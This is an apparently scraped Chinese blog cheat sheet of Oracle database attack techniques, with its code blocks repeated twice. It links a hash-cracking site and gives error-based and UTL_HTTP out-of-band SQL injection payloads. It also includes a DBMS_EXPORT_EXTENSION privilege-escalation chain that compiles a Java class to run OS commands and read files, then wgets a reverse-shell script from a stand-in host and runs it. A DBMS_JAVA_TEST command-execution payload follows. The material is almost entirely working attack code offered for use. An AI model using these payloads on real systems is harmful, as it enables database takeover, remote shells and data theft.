Some Oracle Hacking Tips
oem默认端口5500
oracle的hash在线破解网站http://ops.conus.info:669/,貌似不是很强悍
在终端中连接oracle:
?
Download connect.py
10
11
12
13
14
15
16
su oracle
//local
sqlplus /nolog
conn username/password
//remote
sqlplus /nolog
conn username/password@(description=(address_list=(address=(protocol=tcp)(host=ip_address)(port=1521)))(connect_data=(SERVICE_NAME=orcl)));
utl_http使用:
?
Download utl.py
1
and UTL_HTTP.request('http://IP:port/'||(sql statement))=1--
显错模式注射:
?
Download display_error.py
1
2
3
http://www.xx.com/xx.php?id=1 and 1=(select upper(XMLType(select banner from sys.v_$version where rownum=1)) from dual)--
http://www.xx.com/xx.php?id=1||utl_inaddr.get_host_name((select banner from v$version where rownum=1))
http://www.xx.com/xx.php?id=1 and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))--
创建读写文件的sql文件,登录进去后,执行@filepath
?
Download cwfile.py
国内linx牛的创建方法,记得darkc0de注射脚本也是使用这种方法,可惜我没那个脚本:(wget反弹脚本并执行反弹脚本)
?
Download linx.py
1
2
3
4
5
6
7
8
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader( new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile (java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual;
select sys.LinxRunCMD('/usr/bin/wget http://www.xx.com/docu/data/file/about/pyBack.py -O /var/tmp/pyBack.py') from dual;
select sys.LinxRunCMD('/usr/bin/python /var/tmp/pyBack.py 111.111.111.111 111') from dual;
blackhat上放出的执行命令,不回显,我在win下测试没问题:
?
Download blackhat.py
1
and (Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c','dir>c:\\OUT2.LST') FROM DUAL) is not null --
blackhat_hacking_oracl_2010下载
linx_oracle_php下载
linx_oracle_php的使用,由于使用到UTL_HTTP包,需要把php脚本放到外网上,数据库能够访问到,执行命令那块win直接用cmd /c command,Linux下直接用/bin/bash -c command
oracle的hash在线破解网站http://ops.conus.info:669/,貌似不是很强悍
在终端中连接oracle:
10 11 12 13 14 15 16 |
su oracle //local sqlplus /nolog conn username/password //remote sqlplus /nolog conn username/password@(description=(address_list=(address=(protocol=tcp)(host=ip_address)(port=1521)))(connect_data=(SERVICE_NAME=orcl))); |
1 |
and UTL_HTTP.request('http://IP:port/'||(sql statement))=1-- |
1 2 3 |
http://www.xx.com/xx.php?id=1 and 1=(select upper(XMLType(select banner from sys.v_$version where rownum=1)) from dual)-- http://www.xx.com/xx.php?id=1||utl_inaddr.get_host_name((select banner from v$version where rownum=1)) http://www.xx.com/xx.php?id=1 and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))-- |
1 2 3 4 5 6 7 8 |
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader( new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual; select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual; select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile (java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual; select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual; select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual; select sys.LinxRunCMD('/usr/bin/wget http://www.xx.com/docu/data/file/about/pyBack.py -O /var/tmp/pyBack.py') from dual; select sys.LinxRunCMD('/usr/bin/python /var/tmp/pyBack.py 111.111.111.111 111') from dual; |
1 |
and (Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c','dir>c:\\OUT2.LST') FROM DUAL) is not null -- |
linx_oracle_php下载
linx_oracle_php的使用,由于使用到UTL_HTTP包,需要把php脚本放到外网上,数据库能够访问到,执行命令那块win直接用cmd /c command,Linux下直接用/bin/bash -c command